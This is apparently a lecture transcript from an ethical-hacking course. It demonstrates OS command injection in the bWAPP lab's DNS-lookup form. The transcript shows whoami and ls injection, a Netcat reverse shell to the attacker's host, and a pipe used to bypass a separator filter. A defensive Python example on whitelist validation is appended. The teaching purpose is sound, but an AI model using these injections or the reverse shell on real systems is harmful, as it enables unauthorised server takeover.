Command Injection & SSI
In this course, we continue working on bWAPP and we're going to use it to learn about some new attacks, namely command injection and SSI vulnerabilities.
Hi. Within this lecture, we're going to finally be covering the OS Command Injections. So, we have opened the OS Command Injection page and, as you can see, there is a DNS lookup over here, and if we just run it, we can see it looks up the DNS records of nsa.co. Of course, we can write any website that we want and we can see the result back in here, and in the information gathering section we're actually going to cover the different kinds of DNS lookup tools and we're going to see how we can actually see or use these results as well. But right now we know that when we write something over here, it sends it to the server, the server runs this command, and it gets back to us and shows a result page or something like a paragraph in here. We know about that. Of course, we can try to understand it in a better way using Burp Suite, even though it's pretty self-explanatory. Even though I didn't use the interceptor over here, I haven't intercepted any kind of request, I can still see the requests that are made in here. I can do the intercept and I can come over here and just hit Lookup and I can see the request. It's a POST request, as you can see. It goes to this website, commandi.php, and sends some parameters, like a target and a form. So, the target will be nsa.gov and the form will be submit. So, if you cannot see it in the URL, you can see it from here. Like we have seen before, if you want, you can change the request and forward it in the way that you want. So, there are two parameters, the first of which is target and the second of which is form. So, if I forward this, I can get the results back. So, even though I don't see the parameters in the URL, I can see them in the request in Burp Suite.
As I said before, you don't even have to do this with an intercept. So, you can turn this off, or you can come over here to Target after you forward this. You can still see the request and response. Here you go, this is the response of the request that we made. It's in HTML form and it's displayed to us by our browser interpreting the HTML code. So, that's how it works. So, what we can do is try to do a DNS lookup on other websites, and most of the time, when we see something like this, we can actually just immediately think about OS command injection. So, what I can do is just go to google.com and, with a ; over here, try to run whoami like we have done before. So, if I hit Lookup, it's still in intercepting mode. As you can see, we see the target over here like that. So, I'm going to just turn this off. If I come back, I can see www-data in here. So, it's good news. It's being executed on the server, so I can just do some other stuff: with a ;, rather than whoami, I can try to do ls, for example, and it will show me the files and folders in the current working directory like this. So it's again a code injection. It's being run. It's being executed on the server. So, if you find something like this, then it will be worth a bounty. And what we can do next is try Netcat, for example, and listen for incoming connections in Kali Linux and try to hack into that website, because it will be executed on the server again. So, this will bring us so many opportunities in here. And let me open the Kali terminal and just try to listen for incoming connections. So, I'm going to do the same old thing. I'm going to say Netcat: nc -nvlp 1234. So, remember our code or command. We can run Netcat with nc, then with a space we can specify the IP address that we may want to send this connection to, which is my own Kali Linux IP, which is 10.0.24.
So, we have to specify the same port over here with a space, 1234, and execute this in /bin/bash like this, or /bin/sh if it doesn't work. Don't forget the spaces between the -e and the rest of it. And if I do Lookup, here we go. Now, we get the connection back in Kali. So, if I run whoami, then I can see the details over here. Now, I hacked into the server, so I'm getting back the results. So, we have seen this thing before. We know how to use Netcat and it's working over there as well. So, if you know that something is running some commands on the server, it's worth a shot. And of course, this won't be as easy as this, but again, it would be some kind of easy. So, let me just take this into medium level, and I believe we have to stop this with Ctrl+C in order to make this work. So, I'm inside of the medium level right now. And if I come over here, this is still working. If I do the same old stuff with ; and do ls, let's see if this works. And here you go. It doesn't work. It kind of implemented some sort of security hardening. So, if I do something like this, it won't work either. So, what can we do next? Maybe they try to filter out the ; itself. And is there any way to bypass this filter? Of course, we can try it. But in order to do that, you have to know how this command line works. So maybe you don't know. I'm going to show you anyhow, but you can do some other stuff other than putting some ;s over there. You can do piping. You can do &, and let me show you how it's done. So, if you go to your Kali Linux, you can try to run and execute some commands like this. So, with ;, you can write this and both of them will be executed in order.
So, first ls, then pwd, but also there are a couple of other methods that you can use. So, what do I mean by that? I mean piping, for example. So, this is a pipe sign. You can type it with Alt and dash on Windows, or Option and dash on Mac, and this stands for piping the input to an output, for example, or piping the output to an input. So, if I say ls and pipe the result of the ls to something else, then I can say something like this. Of course, this doesn't make sense to run it this way because I'm not using any input in pwd. If I had been using any input, then it would get the input of the ls and use it in the pwd command, but this time, since it's a command on its own, it didn't use the ls. It actually ran the ls. It executed the ls, but it didn't use it as a parameter or something like that, so we only see the pwd. The other thing is something like this, ls && pwd, so it's basically the same thing. They both execute the ls and pwd. So, rather than ;, you can try &, for example, over here and write pwd. So, if I execute this, it still doesn't work, as you can see, and this doesn't work as well. So, maybe we can try piping and see if they filtered that out. So, if I do piping and say pwd, here we go. It ran the nsa.gov thing but it doesn't show us the result. And we are not interested in that result. We are interested in the malicious part, which is what we write after the pipe. So, that's how you bypass filters. If you get suspicious about command injection, then you're definitely going to have to try piping, & and ; in order to see if that works or not. Now, I hope you understood what we are doing over here. Even though we found a solution this time, it may not be so easy to find OS command injections, so I'm going to show you a tool to automate this process and actually get a shell back. So, this tool is called Commix, and we're going to see how it works within the next lecture.
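The medium-level lesson above, seen from the defender's side, as an added example that is not bWAPP's own code: a filter that only strips ; and & (an assumed model of the medium-level check, not the real one) still lets a pipe through, while a hostname whitelist rejects all three separators, and a lookup built as an argv list means no shell ever parses the target. The function and sample names are mine.

```python
import re
import subprocess

# Added example, not bWAPP code. Models why blacklisting shell
# separators fails and what whitelist validation plus argv-style
# execution looks like for a DNS-lookup feature.

def blacklist_filter(target: str) -> str:
    """Assumed model of a weak filter: strip ';' and '&' only."""
    return target.replace(";", "").replace("&", "")

# Whitelist: labels of letters, digits and hyphens, joined by dots,
# no label starting or ending with a hyphen, total length <= 253.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def is_valid_hostname(target: str) -> bool:
    """Accept only strings that look like a hostname; anything else fails."""
    return bool(HOSTNAME_RE.match(target))

def contains_shell_metachar(s: str) -> bool:
    """Detection helper: flag characters a shell would treat specially."""
    return any(c in s for c in ";|&`$()<>\n")

def build_lookup_argv(target: str) -> list:
    """Validate first, then build an argv list; no shell string is built."""
    if not is_valid_hostname(target):
        raise ValueError("target is not a hostname: %r" % target)
    return ["nslookup", target]

def safe_dns_lookup(target: str) -> str:
    """Run the lookup without shell=True and return its stdout."""
    return subprocess.run(build_lookup_argv(target), capture_output=True,
                          text=True, timeout=10).stdout

if __name__ == "__main__":
    # Constructed sample inputs mirroring the lecture's attempts.
    samples = ["nsa.gov", "nsa.gov; whoami", "nsa.gov & pwd", "nsa.gov | pwd"]
    for t in samples:
        filtered = blacklist_filter(t)
        print(f"{t!r:20} after blacklist={filtered!r:18} "
              f"still has metachar={contains_shell_metachar(filtered)} "
              f"whitelist ok={is_valid_hostname(t)}")
```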
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.